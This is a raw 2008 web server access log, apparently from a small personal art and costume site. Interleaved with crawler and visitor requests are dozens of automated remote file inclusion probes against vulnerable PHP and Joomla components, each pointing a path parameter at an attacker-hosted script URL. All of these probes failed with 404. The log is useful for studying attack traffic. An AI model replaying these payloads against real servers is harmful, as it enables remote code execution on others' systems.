216.167.156.20 - - [29/May/2008:15:43:17 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 350 "-""libwww-perl/5.65"
69.89.21.88 - - [29/May/2008:15:44:05 -0500] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 340 "-""libwww-perl/5.812"
69.89.21.88 - - [29/May/2008:15:44:06 -0500] "GET /administrator/components/com_jreactions/langset.php?comPath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
200.59.145.196 - - [29/May/2008:15:45:13 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:15:45:13 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:15:45:14 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
131.107.0.74 - - [29/May/2008:15:45:20 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "-""IE"
206.212.247.135 - - [29/May/2008:15:45:21 -0500] "GET /logs//include/livre_include.php?no_connect=lol&chem_absolu=http://infects1337.t35.com/TT??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:45:21 -0500] "GET //include/livre_include.php?no_connect=lol&chem_absolu=http://infects1337.t35.com/TT??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
84.21.71.133 - - [29/May/2008:15:45:41 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
84.21.71.133 - - [29/May/2008:15:45:41 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
200.59.145.196 - - [29/May/2008:15:46:10 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
200.135.11.22 - - [29/May/2008:15:50:44 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 316 "-""libwww-perl/5.803"
200.135.11.22 - - [29/May/2008:15:50:44 -0500] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 289 "-""libwww-perl/5.803"
200.135.11.22 - - [29/May/2008:15:50:44 -0500] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 294 "-""libwww-perl/5.803"
74.6.17.187 - - [29/May/2008:15:51:16 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.187 - - [29/May/2008:15:51:17 -0500] "GET /artwork/puzzles.htm HTTP/1.0" 200 1591 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.181.99.12 - - [29/May/2008:15:51:26 -0500] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:15:51:27 -0500] "GET /administrator/components/com_jreactions/langset.php?comPath=http://infects1337.t35.com/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
64.38.8.186 - - [29/May/2008:15:51:31 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
64.38.8.186 - - [29/May/2008:15:51:31 -0500] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
200.135.11.22 - - [29/May/2008:15:52:00 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.0" 404 316 "-""libwww-perl/5.803"
66.232.156.135 - - [29/May/2008:15:56:41 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
66.232.156.135 - - [29/May/2008:15:56:42 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
69.89.21.88 - - [29/May/2008:15:56:47 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
69.89.21.88 - - [29/May/2008:15:56:47 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
212.244.43.139 - - [29/May/2008:15:56:51 -0500] "GET /logs//faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.69"
212.244.43.139 - - [29/May/2008:15:56:52 -0500] "GET //faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.69"
195.209.236.71 - - [29/May/2008:15:57:57 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.209.236.71 - - [29/May/2008:15:57:57 -0500] "GET //Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:15:58:36 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:15:58:36 -0500] "GET //Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
77.245.144.89 - - [29/May/2008:15:59:02 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 314 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
72.55.156.181 - - [29/May/2008:15:59:02 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
72.55.156.181 - - [29/May/2008:15:59:02 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
194.106.229.35 - - [29/May/2008:15:59:22 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://goon.rausch-dalle-wehr.de/cms/media/id2.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.76"
194.106.229.35 - - [29/May/2008:15:59:23 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://goon.rausch-dalle-wehr.de/cms/media/id2.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.76"
194.106.229.35 - - [29/May/2008:15:59:23 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 356 "-""libwww-perl/5.76"
194.106.229.35 - - [29/May/2008:15:59:23 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 351 "-""libwww-perl/5.76"
206.212.247.135 - - [29/May/2008:15:59:46 -0500] "GET /logs/access_log.1207785600//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 389 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:59:46 -0500] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 362 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:59:46 -0500] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.803"
206.212.247.135 - - [29/May/2008:15:59:49 -0500] "GET /logs/access_log.1207180800//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 389 "-""libwww-perl/5.803"
80.231.171.70 - - [29/May/2008:16:00:40 -0500] "GET /logs/include.php?path[docroot]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
80.231.171.70 - - [29/May/2008:16:00:41 -0500] "GET /include.php?path[docroot]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
72.9.228.149 - - [29/May/2008:16:00:46 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.812"
72.9.228.149 - - [29/May/2008:16:00:46 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.812"
80.80.160.21 - - [29/May/2008:16:01:34 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
80.80.160.21 - - [29/May/2008:16:01:34 -0500] "GET //Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
75.125.157.242 - - [29/May/2008:16:03:19 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.villeneuvedolmes.com/cmsimple/arab.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.812"
75.125.157.242 - - [29/May/2008:16:03:19 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.villeneuvedolmes.com/cmsimple/arab.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.812"
202.181.99.12 - - [29/May/2008:16:04:14 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:16:04:15 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.9.228.149 - - [29/May/2008:16:07:23 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.812"
72.9.228.149 - - [29/May/2008:16:07:23 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.812"
202.181.99.12 - - [29/May/2008:16:11:44 -0500] "GET /logs/access_log.1207785600//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 389 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:16:11:44 -0500] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:16:11:45 -0500] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:16:11:50 -0500] "GET /logs/access_log.1207180800//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 389 "-""libwww-perl/5.805"
67.18.151.242 - - [29/May/2008:16:19:58 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.18.151.242 - - [29/May/2008:16:19:58 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
202.181.99.12 - - [29/May/2008:16:20:17 -0500] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:16:20:18 -0500] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
69.89.21.88 - - [29/May/2008:16:25:46 -0500] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 351 "-""libwww-perl/5.812"
69.89.21.88 - - [29/May/2008:16:25:46 -0500] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://infects1337.t35.com/TT??? HTTP/1.1" 404 346 "-""libwww-perl/5.812"
140.142.113.216 - - [29/May/2008:16:30:19 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://www.google.com/search?hl=en&q=costume+bishop%27s+ring""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
140.142.113.216 - - [29/May/2008:16:30:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
74.86.101.159 - - [29/May/2008:16:30:26 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
74.86.101.159 - - [29/May/2008:16:30:26 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
212.244.43.139 - - [29/May/2008:16:30:27 -0500] "GET /logs/access_log.1207008000//data/faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.69"
212.244.43.139 - - [29/May/2008:16:30:27 -0500] "GET //data/faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.69"
212.244.43.139 - - [29/May/2008:16:30:27 -0500] "GET /logs//data/faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.69"
212.244.43.139 - - [29/May/2008:16:31:02 -0500] "GET /logs/access_log.1207785600//data/faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.69"
211.202.2.230 - - [29/May/2008:16:33:19 -0500] "GET /logs/access_log.1207785600//bbs//skin/zero_vote/error.php?dir=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
211.202.2.230 - - [29/May/2008:16:33:20 -0500] "GET //bbs//skin/zero_vote/error.php?dir=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
211.202.2.230 - - [29/May/2008:16:33:20 -0500] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
212.244.43.139 - - [29/May/2008:16:33:37 -0500] "GET /logs/access_log.1207008000//faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 373 "-""libwww-perl/5.69"
212.244.43.139 - - [29/May/2008:16:33:38 -0500] "GET //faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.69"
212.244.43.139 - - [29/May/2008:16:33:38 -0500] "GET /logs//faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.69"
212.244.43.139 - - [29/May/2008:16:34:01 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 373 "-""libwww-perl/5.69"
69.89.21.88 - - [29/May/2008:16:34:12 -0500] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 319 "-""libwww-perl/5.812"
69.89.21.88 - - [29/May/2008:16:34:12 -0500] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
65.55.212.47 - - [29/May/2008:16:34:14 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:34:14 -0500] "GET /artwork/stripped-cat-diorama.png HTTP/1.0" 200 58431 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
211.202.2.230 - - [29/May/2008:16:34:17 -0500] "GET /logs/access_log.1207008000//bbs//skin/zero_vote/error.php?dir=http://xdedzx.com/xdedzx/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
65.55.212.47 - - [29/May/2008:16:35:16 -0500] "GET /artwork/dressers.htm HTTP/1.0" 200 1093 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:16 -0500] "GET /artwork/sculptures.htm HTTP/1.0" 200 3706 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:17 -0500] "GET /artwork/artmaster.htm HTTP/1.0" 200 886 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:17 -0500] "GET /artwork/trunks.htm HTTP/1.0" 200 1275 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:17 -0500] "GET /artwork/furniture.htm HTTP/1.0" 200 1004 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:17 -0500] "GET /artwork/postcards.htm HTTP/1.0" 200 690 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:17 -0500] "GET /artwork/carousel.htm HTTP/1.0" 200 814 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:17 -0500] "GET /artwork/hospitals.htm HTTP/1.0" 200 3315 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:17 -0500] "GET /artwork/flagart.htm HTTP/1.0" 200 923 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:17 -0500] "GET /artwork/mobiles.htm HTTP/1.0" 200 986 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.47 - - [29/May/2008:16:35:18 -0500] "GET /artwork/txt.htm HTTP/1.0" 200 3880 "-""msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
202.181.99.12 - - [29/May/2008:16:36:41 -0500] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
202.181.99.12 - - [29/May/2008:16:36:42 -0500] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
65.214.45.147 - - [29/May/2008:16:50:38 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21563 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
62.112.193.46 - - [29/May/2008:16:50:57 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:16:50:58 -0500] "GET //Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:16:50:58 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
62.112.193.46 - - [29/May/2008:16:50:58 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://infects1337.t35.com/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
82.165.253.72 - - [29/May/2008:16:52:25 -0500] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
82.165.253.72 - - [29/May/2008:16:52:25 -0500] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
74.52.139.226 - - [29/May/2008:16:58:07 -0500] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
74.52.139.226 - - [29/May/2008:16:58:07 -0500] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
208.111.154.15 - - [29/May/2008:17:00:12 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [29/May/2008:17:00:12 -0500] "GET /?M=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
74.6.17.187 - - [29/May/2008:17:04:28 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.20.85.150 - - [29/May/2008:17:15:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
72.36.222.34 - - [29/May/2008:17:15:56 -0500] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://h1.ripway.com/injekz/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
72.36.222.34 - - [29/May/2008:17:15:56 -0500] "GET //oneadmin/newspublish/include.php?path[docroot]=http://h1.ripway.com/injekz/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
208.111.154.15 - - [29/May/2008:17:16:33 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [29/May/2008:17:16:33 -0500] "GET /artwork/hospitals.htm HTTP/1.0" 200 3315 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
59.126.46.141 - - [29/May/2008:17:17:40 -0500] "GET //Neos_Chronos/header.php?base_folder=http://h1.ripway.com/bobbyku/test.txt? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
59.126.46.141 - - [29/May/2008:17:17:40 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://h1.ripway.com/bobbyku/test.txt? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
209.249.86.17 - - [29/May/2008:17:19:27 -0500] "GET /?M=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [29/May/2008:17:19:27 -0500] "GET /icons/folder.gif HTTP/1.0" 200 225 "http://tomdolan.pconline.com/?M=D""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [29/May/2008:17:19:27 -0500] "GET /icons/blank.gif HTTP/1.0" 200 148 "http://tomdolan.pconline.com/?M=D""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [29/May/2008:17:19:27 -0500] "GET /icons/back.gif HTTP/1.0" 200 216 "http://tomdolan.pconline.com/?M=D""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [29/May/2008:17:19:27 -0500] "GET /?M=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
209.249.86.17 - - [29/May/2008:17:19:27 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)"
65.55.208.136 - - [29/May/2008:17:19:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [29/May/2008:17:19:30 -0500] "GET /logs/access_log.1208476800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
211.174.62.136 - - [29/May/2008:17:19:35 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
211.174.62.136 - - [29/May/2008:17:19:35 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
211.174.62.136 - - [29/May/2008:17:19:36 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
65.55.208.130 - - [29/May/2008:17:20:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [29/May/2008:17:20:23 -0500] "GET /logs/access_log.1174262400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [29/May/2008:17:20:24 -0500] "GET /logs/access_log.1196899200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
201.22.57.134 - - [29/May/2008:17:21:35 -0500] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
201.22.57.134 - - [29/May/2008:17:21:36 -0500] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
208.111.154.15 - - [29/May/2008:17:23:02 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.16 - - [29/May/2008:17:23:02 -0500] "GET /memorial HTTP/1.0" 301 320 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
